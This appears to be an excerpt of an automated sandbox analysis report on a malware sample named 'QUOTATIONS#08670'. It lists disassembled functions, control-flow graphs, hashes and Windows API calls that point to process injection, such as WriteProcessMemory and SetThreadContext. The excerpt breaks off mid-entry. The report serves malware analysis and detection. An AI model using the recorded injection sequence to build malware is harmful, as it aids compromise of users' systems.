                                                          Function 079227C0 Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 5454 79227c0-79227da 5455 79227e1-792288c 5454->5455 5456 79227dc 5454->5456 5466 792288f 5455->5466 5456->5455 5467 7922896-79228b2 5466->5467 5468 79228b4 5467->5468 5469 79228bb-79228bc 5467->5469 5468->5466 5470 79229a0-79229e1 call 7923fa1 5468->5470 5471 79228c1-79228db 5468->5471 5472 79229f4-79229f8 5468->5472 5473 7922a2b-7922a31 5468->5473 5474 79228dd-792296d 5468->5474 5469->5471 5469->5473 5488 79229e7-79229ef 5470->5488 5471->5467 5475 79229fa-7922a09 5472->5475 5476 7922a0b-7922a12 5472->5476 5491 7922980-7922987 5474->5491 5492 792296f-792297e 5474->5492 5478 7922a19-7922a26 5475->5478 5476->5478 5478->5467 5488->5467 5493 792298e-792299b 5491->5493 5492->5493 5493->5467
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 6f$6f$$_q
                                                          • API String ID: 0-2170083937
                                                          • Opcode ID: bddc970dcea92d29a83e7a4597779363b2c31273aaf0e9e7522c27d2cf89362f
                                                          • Instruction ID: 4d7e072f89cb110362c0f58761ce3b4a49ec9b9545e72a37c46a0790774a87c4
                                                          • Opcode Fuzzy Hash: bddc970dcea92d29a83e7a4597779363b2c31273aaf0e9e7522c27d2cf89362f
                                                          • Instruction Fuzzy Hash: DD7103B4E00218DFDB04DFA5D58569EBBF2FF89300F21852AD40AAB758DB385946CF51
                                                          Function 079227BF Relevance: 2.7, Strings: 2, Instructions: 162COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 6f$$_q
                                                          • API String ID: 0-708473364
                                                          • Opcode ID: a945cbc57d5daefa6b289589ff73f39c3b4a42b27d64fb2d8c9e3c1842ecfb5d
                                                          • Instruction ID: 531e298d8289220ca27257b04d8a232f98473cc09516a505e53cefb073f54f23
                                                          • Opcode Fuzzy Hash: a945cbc57d5daefa6b289589ff73f39c3b4a42b27d64fb2d8c9e3c1842ecfb5d
                                                          • Instruction Fuzzy Hash: 4371E4B4E002099FDB04DFA5D58559EBBF2FF89300F21852AE40AA7758DB385946CF51
                                                          Function 07929CD0 Relevance: 1.7, APIs: 1, Instructions: 164processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessAsUserW.KERNEL32(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 07929E3B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: CreateProcessUser
                                                          • String ID:
                                                          • API String ID: 2217836671-0
                                                          • Opcode ID: 0dfa3c5ad24dddba50a9ece95405338efbf764ce8440628d98a2abfe93fde93f
                                                          • Instruction ID: c8f3c613666384cdc1cd5e0a03fbab2c76f049dc7dd37dc13cf4c76bd2f449b5
                                                          • Opcode Fuzzy Hash: 0dfa3c5ad24dddba50a9ece95405338efbf764ce8440628d98a2abfe93fde93f
                                                          • Instruction Fuzzy Hash: 7B512AB1D0022ADFCB24DF59C844BDDBBB5BF48314F0484AAE908B7254DB71AA85DF50
                                                          Function 008FAC38 Relevance: 1.6, Strings: 1, Instructions: 300COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ,cq
                                                          • API String ID: 0-2322431649
                                                          • Opcode ID: 9a71742531842ebd6ed54f2bdcc326179b795b3204436206ee6dde2577bd2e53
                                                          • Instruction ID: 07e983f2a79e3da975b7047758c6d75e5a0380d148992246d17e96238b5527bf
                                                          • Opcode Fuzzy Hash: 9a71742531842ebd6ed54f2bdcc326179b795b3204436206ee6dde2577bd2e53
                                                          • Instruction Fuzzy Hash: 77B191B57002099FDB199F78C894B7A7BA6FF85721F158468E509DB2A2CB30EC41CB52
                                                          Function 06D232E8 Relevance: .6, Instructions: 596COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2022576283.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6d20000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b746de685843d3f7488ef6922452fbf8a3b24c784c768ae59851ec183bf80f3a
                                                          • Instruction ID: af17a7f98905da95326e6fe691e8c93b50ca5478ddeac6a4fd64815a0d3ac7f9
                                                          • Opcode Fuzzy Hash: b746de685843d3f7488ef6922452fbf8a3b24c784c768ae59851ec183bf80f3a
                                                          • Instruction Fuzzy Hash: 7D527C30A003168FCB14DF28C944B99B7B2FF89314F2582E9D5586F3A1DB71A986CF81
                                                          Function 06D232D9 Relevance: .6, Instructions: 586COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2022576283.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6d20000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: abe2e5b811e7dcca8d72888788037793a34e0ccdfa9693568ef947dcd31cc200
                                                          • Instruction ID: eb05eb6f2357f98fec14dafd09a281ea56393aed7024b82c5c3dfe7f0d9b7321
                                                          • Opcode Fuzzy Hash: abe2e5b811e7dcca8d72888788037793a34e0ccdfa9693568ef947dcd31cc200
                                                          • Instruction Fuzzy Hash: 8F527E30A007568FCB14DF28C944B99B7B2FF85314F2582E9D5586F3A2DB71A986CF81
                                                          Function 07924B2B Relevance: .3, Instructions: 324COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9649f728fc7badc508f19aceee936acfa86605f4ece096462d81f27232677003
                                                          • Instruction ID: 98e55dd2c89dd71fe9ac47501f491848f203c2ebb582aa2b846b4b4d13e7bf16
                                                          • Opcode Fuzzy Hash: 9649f728fc7badc508f19aceee936acfa86605f4ece096462d81f27232677003
                                                          • Instruction Fuzzy Hash: 31F139B0A1166A8FDB24DF65C94479DBBB6BF88300F10D6E6D40DA7668D7749E82CF00
                                                          Function 07923FF8 Relevance: .2, Instructions: 159COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4eefcd07d4860b8d3011d364edbe3d875efd75a56f2033da2646735e53c1bdc6
                                                          • Instruction ID: f0242880dbe46323de9c9aadb16607e870d0314ff548dadbe3fd40843478bc38
                                                          • Opcode Fuzzy Hash: 4eefcd07d4860b8d3011d364edbe3d875efd75a56f2033da2646735e53c1bdc6
                                                          • Instruction Fuzzy Hash: B86168B0D10269DFCB04DFE5D9446AEBBB1FF89304F10892AD416AB268C7B85A42DF51
                                                          Function 07923FE8 Relevance: .2, Instructions: 154COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6147bd0b0a90b8fe297cb336a0f0fcc4f53b9281fda1b39f946874c632d61128
                                                          • Instruction ID: 7c7e0fd505756b859e10acf9ee28377d5f56eb85a15e5e6143c8ca0fbccd50bf
                                                          • Opcode Fuzzy Hash: 6147bd0b0a90b8fe297cb336a0f0fcc4f53b9281fda1b39f946874c632d61128
                                                          • Instruction Fuzzy Hash: 7F618BB0E10269DFCB04DFA4D8446AEBBB1FF89304F10892AD416EB268C7785E42DF51
                                                          Function 008F97D0 Relevance: 4.6, Strings: 3, Instructions: 820COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 5235 8f97d0-8f9cbe 5310 8f9cc4-8f9cd4 5235->5310 5311 8fa210-8fa245 5235->5311 5310->5311 5312 8f9cda-8f9cea 5310->5312 5316 8fa247-8fa24c 5311->5316 5317 8fa251-8fa26f 5311->5317 5312->5311 5313 8f9cf0-8f9d00 5312->5313 5313->5311 5315 8f9d06-8f9d16 5313->5315 5315->5311 5318 8f9d1c-8f9d2c 5315->5318 5319 8fa336-8fa33b 5316->5319 5329 8fa2e6-8fa2f2 5317->5329 5330 8fa271-8fa27b 5317->5330 5318->5311 5320 8f9d32-8f9d42 5318->5320 5320->5311 5322 8f9d48-8f9d58 5320->5322 5322->5311 5323 8f9d5e-8f9d6e 5322->5323 5323->5311 5325 8f9d74-8f9d84 5323->5325 5325->5311 5326 8f9d8a-8f9d9a 5325->5326 5326->5311 5328 8f9da0-8fa20f 5326->5328 5334 8fa309-8fa315 5329->5334 5335 8fa2f4-8fa300 5329->5335 5330->5329 5336 8fa27d-8fa289 5330->5336 5344 8fa32c-8fa32e 5334->5344 5345 8fa317-8fa323 5334->5345 5335->5334 5343 8fa302-8fa307 5335->5343 5341 8fa2ae-8fa2b1 5336->5341 5342 8fa28b-8fa296 5336->5342 5347 8fa2c8-8fa2d4 5341->5347 5348 8fa2b3-8fa2bf 5341->5348 5342->5341 5354 8fa298-8fa2a2 5342->5354 5343->5319 5344->5319 5345->5344 5356 8fa325-8fa32a 5345->5356 5352 8fa33c-8fa398 5347->5352 5353 8fa2d6-8fa2dd 5347->5353 5348->5347 5360 8fa2c1-8fa2c6 5348->5360 5367 8fa3ab-8fa3b6 5352->5367 5368 8fa39a-8fa3a5 5352->5368 5353->5352 5357 8fa2df-8fa2e4 5353->5357 5354->5341 5364 8fa2a4-8fa2a9 5354->5364 5356->5319 5357->5319 5360->5319 5364->5319 5374 8fa3bc-8fa419 5367->5374 5375 8fa487-8fa4cc call 8f9248 5367->5375 5368->5367 5373 8fa42e-8fa480 5368->5373 5373->5375 5384 8fa422-8fa42b 5374->5384 5392 8fa4ce-8fa4db 5375->5392 5393 8fa4dd-8fa4eb 5375->5393 5402 8fa4fb-8fa4fe 5392->5402 5398 8fa4ed-8fa4f7 5393->5398 5399 8fa4f9 5393->5399 5398->5402 5399->5402
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (o_q$$_q$$_q
                                                          • API String ID: 0-2711016522
                                                          • Opcode ID: 12e602990db855609ff3cbb6b78320ebb51228580a657fb0b6fd4ac825668823
                                                          • Instruction ID: 33045b7d14db8554ffb96d44f6f290a8eb57371a89d076bd2e28e67bf2e55e21
                                                          • Opcode Fuzzy Hash: 12e602990db855609ff3cbb6b78320ebb51228580a657fb0b6fd4ac825668823
                                                          • Instruction Fuzzy Hash: 3C723F74A0021CCFDB159BA8C964BAEBBB6FF84300F1080A9D60AAB3A5DF355D45DF51
                                                          Function 071E0EF4 Relevance: 3.9, Strings: 3, Instructions: 118COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 5495 71e0ef4-71e0f15 5495->5495 5496 71e0f17-71e0f34 5495->5496 5497 71e0f59-71e0f6e 5496->5497 5498 71e0f36-71e0f40 5496->5498 5499 71e0fb0-71e0fc6 5497->5499 5500 71e0f70-71e0f73 5497->5500 5498->5497 5501 71e0f88-71e0f92 5499->5501 5502 71e0fc8-71e0fd0 5499->5502 5503 71e0f94-71e0fae 5501->5503 5504 71e1003-71e1050 5501->5504 5503->5499 5512 71e1056-71e1059 5504->5512 5513 71e1061-71e1075 5512->5513
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2024910722.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_71e0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$TJdq$Te_q
                                                          • API String ID: 0-4144917423
                                                          • Opcode ID: 88bad85a27b07389514503a7e6fa3fa9c56ef1f40ca6b5b14d2cc19ea40901bb
                                                          • Instruction ID: 74de547f5223c3bded492b628ebd12884edafaf8093824571b197c1f276d7972
                                                          • Opcode Fuzzy Hash: 88bad85a27b07389514503a7e6fa3fa9c56ef1f40ca6b5b14d2cc19ea40901bb
                                                          • Instruction Fuzzy Hash: 4D41669160E7D10FD707573898242597FB1AF8B118B2E41DBD186CF6E3DA698C0AC3A6
                                                          Function 008F6D98 Relevance: 2.8, Strings: 2, Instructions: 287COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 5612 8f6d98-8f6dbf 5613 8f6ddb-8f6deb call 8f67f0 5612->5613 5614 8f6dc1-8f6dd9 5612->5614 5618 8f6df0-8f6df5 5613->5618 5614->5618 5754 8f6df7 call 8f6d98 5618->5754 5755 8f6df7 call 8f70a0 5618->5755 5620 8f6dfd-8f6e03 5621 8f7089-8f70ae 5620->5621 5622 8f6e09-8f6e17 5620->5622 5625 8f70bd-8f70cf 5621->5625 5626 8f70b0-8f70b6 5621->5626 5627 8f6e6f-8f6e78 5622->5627 5628 8f6e19-8f6e20 5622->5628 5639 8f70d5-8f70d9 5625->5639 5640 8f7163-8f7167 call 8f72f0 5625->5640 5626->5625 5629 8f6e7e-8f6e82 5627->5629 5630 8f6fac-8f6fd8 5627->5630 5631 8f6f79-8f6fa5 5628->5631 5632 8f6e26-8f6e2b 5628->5632 5634 8f6e84-8f6e8d 5629->5634 5635 8f6e93-8f6ea8 5629->5635 5681 8f6fdf-8f7049 5630->5681 5631->5630 5636 8f6e2d-8f6e33 5632->5636 5637 8f6e43-8f6e51 5632->5637 5634->5630 5634->5635 5748 8f6eab call 8f79a8 5635->5748 5749 8f6eab call 8f79b8 5635->5749 5642 8f6e37-8f6e41 5636->5642 5643 8f6e35 5636->5643 5650 8f6e5a-8f6e6a 5637->5650 5651 8f6e53-8f6e55 5637->5651 5645 8f70db-8f70e7 5639->5645 5646 8f70e9-8f70f6 5639->5646 5649 8f716d-8f7173 5640->5649 5642->5637 5643->5637 5670 8f70f8-8f7102 5645->5670 5646->5670 5647 8f6eb1-8f6eb8 5653 8f6eba-8f6ec5 5647->5653 5654 8f6ed3-8f6ed7 5647->5654 5658 8f717f-8f7186 5649->5658 5659 8f7175-8f717b 5649->5659 5660 8f6f6f-8f6f76 5650->5660 5651->5660 5750 8f6ec8 call 8fa405 5653->5750 5751 8f6ec8 call 8f97c0 5653->5751 5752 8f6ec8 call 8f97d0 5653->5752 5656 8f6edd-8f6ee1 5654->5656 5657 8f7050-8f7082 5654->5657 5656->5657 5665 8f6ee7-8f6ef2 5656->5665 5657->5621 5666 8f717d 5659->5666 5667 8f71e1-8f7240 5659->5667 5663 8f6ece 5663->5660 5665->5657 5679 8f6ef8-8f6f25 5665->5679 5666->5658 5696 8f7247-8f726b 5667->5696 5677 8f712f-8f7133 5670->5677 5678 8f7104-8f7113 5670->5678 5682 8f713f-8f7143 5677->5682 5683 8f7135-8f713b 5677->5683 5691 8f7115-8f711c 5678->5691 5692 8f7123-8f712d 5678->5692 5679->5657 5694 8f6f2b-8f6f3a 5679->5694 5681->5657 5682->5658 5687 8f7145-8f7149 5682->5687 5688 8f713d 5683->5688 5689 8f7189-8f71da 5683->5689 5695 8f714f-8f7161 5687->5695 5687->5696 5688->5658 5689->5667 5691->5692 5692->5677 5756 8f6f3d call 8f97c0 5694->5756 5757 8f6f3d call 8f97d0 5694->5757 5695->5658 5706 8f726d-8f726f 5696->5706 5707 8f7271-8f7273 5696->5707 5702 8f6f43-8f6f47 5702->5681 5708 8f6f4d-8f6f59 5702->5708 5711 8f72e9-8f72ec 5706->5711 5712 8f7275-8f7279 5707->5712 5713 8f7284-8f7286 5707->5713 5720 8f6f61-8f6f67 5708->5720 5718 8f727f-8f7282 5712->5718 5719 8f727b-8f727d 5712->5719 5715 8f7299-8f729f 5713->5715 5716 8f7288-8f728c 5713->5716 5724 8f72ca-8f72cc 5715->5724 5725 8f72a1-8f72c8 5715->5725 5722 8f728e-8f7290 5716->5722 5723 8f7292-8f7297 5716->5723 5718->5711 5719->5711 5720->5657 5727 8f6f6d 5720->5727 5722->5711 5723->5711 5729 8f72d3-8f72d5 5724->5729 5725->5729 5727->5660 5734 8f72db-8f72dd 5729->5734 5735 8f72d7-8f72d9 5729->5735 5737 8f72df-8f72e4 5734->5737 5738 8f72e6 5734->5738 5735->5711 5737->5711 5738->5711 5748->5647 5749->5647 5750->5663 5751->5663 5752->5663 5754->5620 5755->5620 5756->5702 5757->5702
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Hcq$Hcq
                                                          • API String ID: 0-4088181183
                                                          • Opcode ID: c6da09cfe1390dbf460d55adcedfcfb198127a390fa320de78a840e104dbeeb4
                                                          • Instruction ID: b9e4c710dcadf61b0035c2645272a388d6f30a5791e3db58fc567faf85c91a2c
                                                          • Opcode Fuzzy Hash: c6da09cfe1390dbf460d55adcedfcfb198127a390fa320de78a840e104dbeeb4
                                                          • Instruction Fuzzy Hash: A5A1BB317002199FDB14AF78D858B7E7BA6FB88300F248529E606CB394EF719D55CB91
                                                          Function 008F7498 Relevance: 2.7, Strings: 2, Instructions: 232COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ,cq$,cq
                                                          • API String ID: 0-2927840315
                                                          • Opcode ID: 336337fdf70e6e07539fb755795167e225323acb273e57114e9ad9731b1a5b6e
                                                          • Instruction ID: 22a29f66ecfa80921c80ae893aeeee212019b752e5ccf0c95850f6077b13fd9c
                                                          • Opcode Fuzzy Hash: 336337fdf70e6e07539fb755795167e225323acb273e57114e9ad9731b1a5b6e
                                                          • Instruction Fuzzy Hash: 4181BC30A0890A8FEB14CF7CC8849BAB7B2FF99305B258169D605DB360D735EC41CB61
                                                          Function 008F542C Relevance: 2.7, Strings: 2, Instructions: 189COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (cq$(cq
                                                          • API String ID: 0-4121650363
                                                          • Opcode ID: 32991671bbac5b38365425746ca0248a441fc061524a38b1cd5973d77bd7dcec
                                                          • Instruction ID: 71e61f24ebe4b81b505c5e96b481487e99f853c0ec69c52974474e56219b2b21
                                                          • Opcode Fuzzy Hash: 32991671bbac5b38365425746ca0248a441fc061524a38b1cd5973d77bd7dcec
                                                          • Instruction Fuzzy Hash: 5861DF31E006198FCB04DBB8D8546AEBBF2FF98311F24856AD615EB391DB349D05CBA1
                                                          Function 071E1000 Relevance: 2.5, Strings: 2, Instructions: 43COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2024910722.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_71e0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: TJdq$Te_q
                                                          • API String ID: 0-3934155944
                                                          • Opcode ID: 923a8689600a7c01c98a63b32c922e70a039e4172278fc3abfa21715affdfb59
                                                          • Instruction ID: fc63d47978ec38ef59b9dddefb6e12882d422f49c839e7fc476df95b47e25d7c
                                                          • Opcode Fuzzy Hash: 923a8689600a7c01c98a63b32c922e70a039e4172278fc3abfa21715affdfb59
                                                          • Instruction Fuzzy Hash: D0F096317004241FC708A77DA46893E77DBAFC9A247154159F50ACB3A1DE61DD068396
                                                          Function 071E06C0 Relevance: 1.8, Strings: 1, Instructions: 535COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2024910722.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_71e0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Te_q
                                                          • API String ID: 0-823545363
                                                          • Opcode ID: 254bb161524962317ecdd78f1f87dc7e5e5e78787de7ee2286a280fadb6de61f
                                                          • Instruction ID: 2e3b59d2493b16c861a5bc440a554cd56764480f409341c14bc698031a2a6700
                                                          • Opcode Fuzzy Hash: 254bb161524962317ecdd78f1f87dc7e5e5e78787de7ee2286a280fadb6de61f
                                                          • Instruction Fuzzy Hash: 10127E70F102248BC704FFF8D89966DBBF6BB88604F908529D489E7394DF789856C752
                                                          Function 071E06D0 Relevance: 1.8, Strings: 1, Instructions: 526COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2024910722.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_71e0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Te_q
                                                          • API String ID: 0-823545363
                                                          • Opcode ID: 42c92ef82e6662b1f8603bb52618ae7a61d2a45406138fd3105a64698c603414
                                                          • Instruction ID: d4c81fe129d80936b13b78ae6d638898f020f6602a09061f98b702180640721c
                                                          • Opcode Fuzzy Hash: 42c92ef82e6662b1f8603bb52618ae7a61d2a45406138fd3105a64698c603414
                                                          • Instruction Fuzzy Hash: 15126F70F102248BC704FFF8D89965DBBF6BB88604F908529D489E7394DF789856C752
                                                          Function 057E231E Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 057E23B1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2021137716.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_57e0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: CallProcWindow
                                                          • String ID:
                                                          • API String ID: 2714655100-0
                                                          • Opcode ID: 1708fdeb0658b8ea6c5dde89c52af2db7302435264590c450871d0a168fd2cc9
                                                          • Instruction ID: 6da3c46aab81f6e156a20eba020c3af9d43daeaf7226e1b7d1e94c28d4453048
                                                          • Opcode Fuzzy Hash: 1708fdeb0658b8ea6c5dde89c52af2db7302435264590c450871d0a168fd2cc9
                                                          • Instruction Fuzzy Hash: F23129B9A003058FDB04CF59C448AAABBF6FF8C314F25C499D519AB321D774A845DFA0
                                                          Function 0792C2B8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0792C348
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: 59f82f93e2f80062d4dd07e6ebb30dafe889cab0e4cd384650d965f37133fecd
                                                          • Instruction ID: b796c12773f83759e6fc4c06a1ef2b91acea0386f82f1ede555a012742f4b8c7
                                                          • Opcode Fuzzy Hash: 59f82f93e2f80062d4dd07e6ebb30dafe889cab0e4cd384650d965f37133fecd
                                                          • Instruction Fuzzy Hash: 842157B19003599FCB10DFA9C881BDEBBF5FF48310F10882AE919A7240C7789945DBA0
                                                          Function 0792B890 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0792B90E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          • Opcode ID: dd7e93dbf90d38268ae848b3149e6e2150b0ae614f32c73b859e6caeab9bb964
                                                          • Instruction ID: 523544c947106234fe3e719fd6c2f56e73de8bd3aaa2637841138369a0b3e235
                                                          • Opcode Fuzzy Hash: dd7e93dbf90d38268ae848b3149e6e2150b0ae614f32c73b859e6caeab9bb964
                                                          • Instruction Fuzzy Hash: 792135B1D003199FDB14DFAAC4857EEBBF4EF48324F14842AD459A7240DB78A945CFA1
                                                          Function 0792CCA8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0792CD26
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          • Opcode ID: 92593c4a8f47a858f43b3a633b562f9f5228fd6f39534bf64dbe91a3034592a3
                                                          • Instruction ID: c58386fd91e0347b8a172ed0ba7dd756342b540244c9a07d93e840ca16e1f10d
                                                          • Opcode Fuzzy Hash: 92593c4a8f47a858f43b3a633b562f9f5228fd6f39534bf64dbe91a3034592a3
                                                          • Instruction Fuzzy Hash: 9C2134B1D002199FDB10DFAAC4857EEBBF4AF89324F10842AD459A7241C778A945CFA1
                                                          Function 0792CA08 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualProtectEx.KERNEL32(?,?,?,?,?), ref: 0792CA7F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: b3e168c12a0b0e988f7e4abf8014c4d88b70ac7bc1ed29d0dc501d428a3d6ff4
                                                          • Instruction ID: 755b6e82556eb6d99fd8ce02f139e5d18e098b34993c3f4c9acc9b044a57a7bb
